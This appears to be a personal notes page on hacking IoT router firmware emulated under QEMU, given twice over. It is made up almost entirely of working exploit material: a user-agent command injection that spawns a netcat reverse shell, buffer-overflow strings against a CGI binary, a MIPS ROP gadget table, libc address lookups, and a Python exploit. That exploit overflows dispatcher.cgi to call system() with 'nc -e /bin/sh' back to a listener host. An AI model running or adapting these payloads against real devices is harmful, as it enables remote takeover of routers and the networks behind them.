hortinstein/IOT Hacking

## IOT Hacking
curl 127.0.0.1:80 -A '`/bin/busybox nc 127.0.0.1 5555 -e /bin/sh`'

sudo chroot . ./qemu-mipsel -g 4321 bin/overflowme `python -c "print 'A'*260+'\xA0\x07\x40'"`

#start lighttpd
chroot . /usr/sbin/lighttpd -f ./etc/init.d/service_httpd/lighttpd.conf

#start gdb server
gdbserver --attach 0.0.0.0:1234 715

#kill the GDB server && find new dispatch pid && start the new GDB server
kill -9 `ps -ae | grep gdbserver | cut -d " " -f 3` && kill -9 `ps -ae | grep dispatcher | cut -d " " -f 3` &&

gdbserver --attach 0.0.0.0:1234 `ps -ae | grep dispatcher | cut -d " " -f 3`

set arch mips
set endian little
target remote 0.0.0.0:1234

curl http://127.0.0.1/dispatcher.cgi?template=common.jsfw_.pdf.gz`python -c 'print 0x50C*"A"+"BABA"'`


----------------------------------------------------------------------------------------------------------------
|  Address     |  Action                                              |  Control Jump                          |
----------------------------------------------------------------------------------------------------------------
|  0x0042C1AC  |  addiu $a0,$sp,0x130+var_E4                          |  jalr  $s2                             |
|  0x0042FBB0  |  addiu $a0,$sp,0x1038+var_810                        |  jalr  $s0                             |
|  0x00432624  |  addiu $a0,$sp,0x158+var_E8                          |  jalr  $s0                             |
----------------------------------------------------------------------------------------------------------------

0049FA04 - system
p &system = 0x2ab014a0
2aed6000-2af2d000 r-xp 00000000 08:01 586684     /root/squashfs-root/lib/libuClibc-0.9.29.so


curl -G -v "http://localhost:30001/data" --data-urlencode "msg=hello world" --data-urlencode "msg2=hello world2"

#gets the
objdump -T /root/squashfs-root/lib/libuClibc-0.9.29.so | grep system | cut -d' ' -f1

#gets the libuCl
 cat /proc/1820/maps | grep libuCl | grep x | cut -d' ' -f1 | cut -d'-' -f1


``` py
import urllib2

buf = "A" * 0x4eB

# 2AF227E0

buf += "\xE0\x27\xF2\x2A" #$s0 = system

buf += "A" * 32 # \x20
#2AEFB7A0
buf += "\xA0\xB7\xEF\x2A" #$ra = gadget

buf += "A" * 0x18
buf += 'nc${IFS}172.17.5.102${IFS}5555${IFS}-e${IFS}/bin/sh'

#172.17.5.102 5555
url = 'http://172.17.5.100:8080/dispatcher.cgi?template=jquery.js.pdf.gz' + buf
print urllib2.urlopen(url)
```
	curl 127.0.0.1:80 -A '`/bin/busybox nc 127.0.0.1 5555 -e /bin/sh`'

	sudo chroot . ./qemu-mipsel -g 4321 bin/overflowme `python -c "print 'A'*260+'\xA0\x07\x40'"`

	#start lighttpd
	chroot . /usr/sbin/lighttpd -f ./etc/init.d/service_httpd/lighttpd.conf

	#start gdb server
	gdbserver --attach 0.0.0.0:1234 715

	#kill the GDB server && find new dispatch pid && start the new GDB server
	kill -9 `ps -ae \| grep gdbserver \| cut -d " " -f 3` && kill -9 `ps -ae \| grep dispatcher \| cut -d " " -f 3` &&

	gdbserver --attach 0.0.0.0:1234 `ps -ae \| grep dispatcher \| cut -d " " -f 3`

	set arch mips
	set endian little
	target remote 0.0.0.0:1234

	curl http://127.0.0.1/dispatcher.cgi?template=common.jsfw_.pdf.gz`python -c 'print 0x50C*"A"+"BABA"'`


	----------------------------------------------------------------------------------------------------------------
	\| Address \| Action \| Control Jump \|
	----------------------------------------------------------------------------------------------------------------
	\| 0x0042C1AC \| addiu $a0,$sp,0x130+var_E4 \| jalr $s2 \|
	\| 0x0042FBB0 \| addiu $a0,$sp,0x1038+var_810 \| jalr $s0 \|
	\| 0x00432624 \| addiu $a0,$sp,0x158+var_E8 \| jalr $s0 \|
	----------------------------------------------------------------------------------------------------------------

	0049FA04 - system
	p &system = 0x2ab014a0
	2aed6000-2af2d000 r-xp 00000000 08:01 586684 /root/squashfs-root/lib/libuClibc-0.9.29.so


	curl -G -v "http://localhost:30001/data" --data-urlencode "msg=hello world" --data-urlencode "msg2=hello world2"

	#gets the
	objdump -T /root/squashfs-root/lib/libuClibc-0.9.29.so \| grep system \| cut -d' ' -f1

	#gets the libuCl
	cat /proc/1820/maps \| grep libuCl \| grep x \| cut -d' ' -f1 \| cut -d'-' -f1


	``` py
	import urllib2

	buf = "A" * 0x4eB

	# 2AF227E0

	buf += "\xE0\x27\xF2\x2A" #$s0 = system

	buf += "A" * 32 # \x20
	#2AEFB7A0
	buf += "\xA0\xB7\xEF\x2A" #$ra = gadget

	buf += "A" * 0x18
	buf += 'nc${IFS}172.17.5.102${IFS}5555${IFS}-e${IFS}/bin/sh'

	#172.17.5.102 5555
	url = 'http://172.17.5.100:8080/dispatcher.cgi?template=jquery.js.pdf.gz' + buf
	print urllib2.urlopen(url)
	```